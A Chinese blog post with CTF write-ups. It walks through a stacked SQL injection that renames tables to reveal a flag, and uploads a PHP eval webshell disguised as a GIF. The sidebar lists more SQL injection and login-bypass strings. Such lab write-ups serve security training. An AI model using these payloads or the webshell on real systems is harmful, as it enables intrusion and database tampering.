CTF第七天

最新推荐文章于 2023-04-25 21:29:08 发布
最新推荐文章于 2023-04-25 21:29:08 发布
阅读量192 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52680097/article/details/117421343
版权

[强网杯 2019]随便注 1

先打这个

1' and 1=1#和
1' and 1=2#
返回结果不同,说明有sql注入

再打1' or 1=1#
虽然不知道这些信息有啥用
在这里插入图片描述
再看看有几列
当输入1' order by 3#时返回了报错信息,说明只有2列
在这里插入图片描述
接下来试试堆叠注入
堆叠注入原理
在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。

mysql> select * from users where id =1;delete from users;    //分号以前的句子功能是查询,后面的句子是删除用户

我们试试1'; show databases#返回了很多库
在这里插入图片描述
看着ctftraining感觉很可疑,我们来看看

1';show tables from ctftraining#

进去后有两个表名,我以为有东西,但输入

1';show columns from `FLAG_TABLE`#

没返回
那输入1'; show tables#看表名
在这里插入图片描述

一个一个库看看

1'; show columns from words#
1'; show columns from `1919810931114514`# 这里必须加这个`,在键盘左上角

words表中的
在这里插入图片描述
另一个表中的
在这里插入图片描述
可以看到words表里有两个属性,即两列:id 和data
而1919810931114514表里只有一个属性列
说明输入框可能查询的就是words表
后台sql语句可能为

select id,data from words where id=

接下来就是如何获取flag了
思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
在这之前当然要先把words表改名为其他
payload(注意这是一个很长的堆叠注入):

1';rename table `words` to words2; ;rename table `1919810931114514` to `words`;;alter table words change flag id varchar(100);;show tables; ;show columns from words;#

在这里插入图片描述
其他解法

[极客大挑战 2019]Upload 1

首先试了试,这个只能上传图片
我们上传个一句话木马,把Content-Type改成image/jpeg
在这里插入图片描述
发现php,php3,php4,php5都会被拦截
在这里插入图片描述
但是.phtml格式的文件可以

<script language="php">eval($_POST['shell']);</script>

于是构造这个上去,发现文件头也需要改
在这里插入图片描述
构造payloadGIF89a? <script language="php">eval($_POST['shell']);</script>
上传改文件类型为image/jpeg
在这里插入图片描述
上传成功
在这里插入图片描述
用蚁剑连,慢慢找就行,最后发现在根目录下
在这里插入图片描述

这里有<?过滤,所以以下两个木马不能用

<?php eval($_POST['b'])?>
<?php $_GET['a']($_POST['b'])?>

这里有四个知识点
1.Content—type的绕过
2.文件后缀名,.phtml
3.文件头
4.<?的过滤

、Ange射手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 supersqli
qq_51744055的博客
06-11 120
输入1’ 不回显,输入1’# 显示正常。应该存在sql注入 根据 1’ and 1=1判断 1’ order by 2# 发现有两列 order by 3时候报错 输入 联合查询 1’ union select 1,database()# return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 返回黑名单 堆叠注入: --+要在url中输入,hackerbar,输入框中对
【极客大挑战 2019】EasySQL
Knsec
05-13 8750
[极客大挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
手工注入详解
zsch591488385的专栏
10-28 1603
1.检测注入点: 一般是在连接的后面添加and 1=1 and 1=2 如果2次返回的页面不同就意味着存在注入漏洞。 注入点我找好了! 2次返回不一样,说明存在注入漏洞! 2.猜解表名: 在注入点后面输入 and(select count(*) fromadmin) 猜admin的表是否存在(返回正常则存在admin的表名,返回错误就是不存在admin的表名)admi
CTFhub Cookie注入
plant1234的博客
06-18 736
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
CTF之懵懂时期系列---因缺思汀的绕过
nini_boom的博客
04-07 431
题目链接:http://ctf5.shiyanbar.com/web/pcat/index.php 这道题严格来说,我只解了一半,考点在于源码分析、group by with rollup、关键字绕过. 这一篇的文章和之前ctf系列的不一样,之前的都是学习,反推别人的思路,这次以自己的思路为博客的主线。 一、发现源码 右键查看网页源代码(ctf是否有意培养我们这样的习惯?) source....
CTF内存取证入坑指南!稳!题目
03-28
3. `pslist`:列出系统中运行的所有进程,这是查找可疑活动的第一步。 4. `netscan`:发现活动的网络连接,包括端口、协议和远程IP。 5. `dlllist`:查看加载到进程空间的动态链接库(DLL),这有助于找出异常或恶意...
ctf,web攻防工具-御剑1.5.7z
04-06
1. **网站枚举**:御剑能够自动探测目标网站的子域名、目录和文件,这是了解目标系统结构的第一步,也是发现潜在漏洞的关键。 2. **弱口令扫描**:它内置了大量的常见用户名和密码组合,可以尝试登录目标系统,检查...
CTF Web各种题目的解题姿势
07-27
第7章 第7章 Python基础 课时1:7.1-Requests模块安装与介绍15'28 课时2:7.2-Python requests库 使用18'26 课时3:7.3-XSS自动化检测13'23 课时4:7.4-Python-SQL自动化检测07'59 课时5:7.5-Python 源码泄露...
hacker101-ctf:Hacker101 CTF编写
02-06
0x01 CTF 难度(点) 名称技能专长完成时间琐碎的(1 /标志)网页1/1 容易(2 /标志) 网页4/4 中(3 /标志) 网页3/3 硬(9 /旗) 网络,加密1/4 中(6 /标记)网页3/3 中(5 /标记)网页3/3 容易(4 /标志)网页7/...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
sql注入
qq_63267612的博客
04-03 3362
文章目录一些简单的判断注入点的方法: 一些简单的判断注入点的方法: 1.单引号判断 http://www.xxx.com/xxx.asp?id=10’ 如果出现错误提示,则该网站可能就存在注入漏洞。 2.and判断 http://www.xxx.com/xxx.asp?id=10’and 1=1这个条件永远都是真的,所以当然返回是正常页 http://www.xxx.com/xxx.asp?id=10’and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。 3.or判断(
【SQL注入】字符型注入
noob_3000的博客
08-07 544
SQL字符型注入
学习渗透日记3 SQL布尔盲注
最新发布
qq_56902810的博客
04-25 152
记一次数据库dvwa靶场盲注
渗透测试 | SQL注入字符注入详解
yu_19980401的博客
11-17 2114
SQL注入详解 SQL注入的概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 字符注入 后台语句模板 SELECT first_name,last_name FROM users WHERE user_id = ‘$id’; 正常访问 SELECT first_name,last_name FROM users WHERE user_id = ‘1’; 构造SQL注入语句 SELECT firs_name,last_name FROM user
sql注入之显错注入
qq_33557485的博客
05-05 1766
1.判断是否存在注入点: 在正常输入后面添加and 1=1 查看是否正常回显。如果一切正常说明该处存在注入点。#是数据库查询的结束标志。?id=1' and 1=1# 这里的?id=1’使用单引号闭合查询语句。不同的查询写法使用响应的闭合方式 2.猜解字段数。 每一个数据库查询语句的结果都是一个表格,使用order by查询该查询结果一共查询了几个字段。因为使用union查询前后的字段数必须...
攻防世界 supersqli(堆叠注入)
m0_56107268的博客
05-04 1812
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
sql注入,关于id=‘1 and 1=1‘
热门推荐
m0_55306747的博客
11-25 1万+
在做sql-labs靶场时,学到了,这个知识点很重要,当时发现这个问题困惑了我许久 正常的注入语句:select * from users where id = 1 select * from users where id = '1'也可以查询出和语句一相同的结果 select * from users where id = '$id' 令id=1" 语句变为select * from users where id = '1"' 此时引号正常闭合,按理说应当是查询users表中,id为1"的所有
sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
wjwqp的专栏
03-01 1万+
admin 'or '1'='1'# (# 为注释后面内容) admin'-- admin'or4=4-- admin'or'1'='1'-- admin888 "or"a"="a admin'or2=2# a'having1=1# a'having1=1-- admin'or'2'='2 ')or('a'='a or4=4-- c a'or'4=4-- "or...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值